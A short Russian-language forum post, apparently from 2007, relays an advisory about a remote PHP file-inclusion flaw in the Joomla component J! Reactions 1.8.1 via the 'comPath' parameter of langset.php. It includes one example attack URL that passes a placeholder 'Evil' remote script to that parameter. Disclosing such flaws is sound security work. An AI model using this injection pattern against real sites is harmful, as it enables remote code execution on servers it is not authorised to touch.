Уязвимость в J! Reactions 1.8.1

Тема в разделе "Вопросы безопасности", создана пользователем chilly_bang, 23.08.2007.

  1. chilly_bang
    Offline

    chilly_bang специалист

    Регистрация:
    30.04.2006
    Сообщения:
    1 545
    Симпатии:
    38
    Пол:
    Мужской
    Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «comPath» сценарием langset.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

    Пример:

    _http://www.example.com / administrator/components/ com_jreactions/langset.php?comPath=Evil?

    original: _http://xakep.ru/post/39824/default.asp
     
  2.  

Поделиться этой страницей

Загрузка...